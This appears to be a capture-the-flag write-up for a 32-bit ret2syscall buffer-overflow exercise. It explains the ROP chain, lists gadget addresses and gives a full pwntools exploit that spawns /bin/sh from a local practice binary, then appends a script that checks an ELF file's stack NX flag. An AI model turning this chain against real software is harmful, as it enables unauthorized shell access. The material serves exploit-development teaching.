1. Routine checks first: the program is a 32-bit binary with NX enabled, so writing shellcode onto the stack and executing it will fail.
2. The return address can still be overwritten through gets(). Although a "/bin/sh" string is present in the binary, there is no system() to call system("/bin/sh") and get a shell, so we have to make the system call ourselves. (Note: each libc function that wraps a system call has a corresponding system call number, which can be looked up in a Linux syscall reference.)
3. Here execve() is used to spawn the shell: EAX takes the syscall number 0x0b, EBX points to "/bin/sh", and ECX and EDX are set to 0 (NULL argv and envp).
4. Determine the offset needed to reach the saved return address.
5. Find gadgets that load the arguments into the registers, in order to build the exploit. The gadgets used here are not the only choice; any that achieve the same effect will do.
6. Here I selected the following gadgets:
0x080bb196 : pop eax ; ret
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806eb6a : pop edx ; ret
7. Build the exploit:
#!/usr/bin/env python
from pwn import *

p = process('./rop')

# Stack state observed in gdb at the time of the overflow:
#EBP: 0xffffd178 --> 0x8049630 (<__libc_csu_fini>: push ebx)
#ESP: 0xffffd0f0 --> 0xffffd10c --> 0x3

bin_sh = 0x080BE408        # address of the "/bin/sh" string in the binary
call_gets = 0x08048E96     # address of the call to gets() (not used in this chain)
pop_eax = 0x080bb196       # pop eax ; ret
pop_ecx_ebx = 0x0806eb91   # pop ecx ; pop ebx ; ret
pop_edx = 0x0806eb6a       # pop edx ; ret
int_0x80 = 0x08049421      # int 0x80

payload = b'a' * (0x6c + 4)   # padding up to the saved return address
payload += p32(pop_eax)
payload += p32(0xb)           # eax = 0x0b (execve)
payload += p32(pop_ecx_ebx)
payload += p32(0)             # ecx = 0 (argv)
payload += p32(bin_sh)        # ebx = "/bin/sh"
payload += p32(pop_edx)
payload += p32(0)             # edx = 0 (envp)
payload += p32(int_0x80)      # execve("/bin/sh", 0, 0)

p.recvuntil(b'?')
p.sendline(payload)
p.interactive()
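The NX check in step 1 is normally done with checksec, but it comes down to one ELF program header: PT_GNU_STACK carries the stack permissions, and a set PF_X bit (or a missing header) means the stack is executable and the shellcode route the writeup rules out would have worked. The script below is an added example, not part of the original writeup; it parses that header from a 32-bit ELF and builds a constructed sample image for testing.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header type that records stack permissions
PF_X = 0x1                  # execute bit in p_flags


def nx_enabled(elf: bytes):
    """Return True if PT_GNU_STACK is present without PF_X (stack not executable),
    False if PF_X is set or the header is missing (the loader then falls back to
    an executable stack), or None if this is not a 32-bit little-endian ELF."""
    if len(elf) < 52 or elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        return None
    e_phoff, = struct.unpack_from("<I", elf, 0x1C)          # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x2A)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from("<I", elf, off)        # Elf32_Phdr.p_type
        p_flags, = struct.unpack_from("<I", elf, off + 24)  # Elf32_Phdr.p_flags
        if p_type == PT_GNU_STACK:
            return not (p_flags & PF_X)
    return False


def build_elf32(stack_flags=None):
    """Constructed test data: a minimal ELF32/i386 image (header + program headers
    only, not loadable), with an optional PT_GNU_STACK entry carrying stack_flags."""
    phdrs = [(1, 0, 0x08048000, 0x08048000, 0, 0, 0x5, 0x1000)]  # PT_LOAD, r-x
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8     # ELFCLASS32, LSB, v1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048000, 52, 0, 0,
                               52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(struct.pack("<8I", *p) for p in phdrs)


if __name__ == "__main__":
    # Usage: python3 nxcheck.py ./rop   (no argument: check the constructed sample)
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_elf32(0x6)
    state = {True: "NX enabled", False: "NX disabled", None: "not an ELF32 LSB file"}
    print(f"{path or 'constructed sample'}: {state[nx_enabled(data)]}")
```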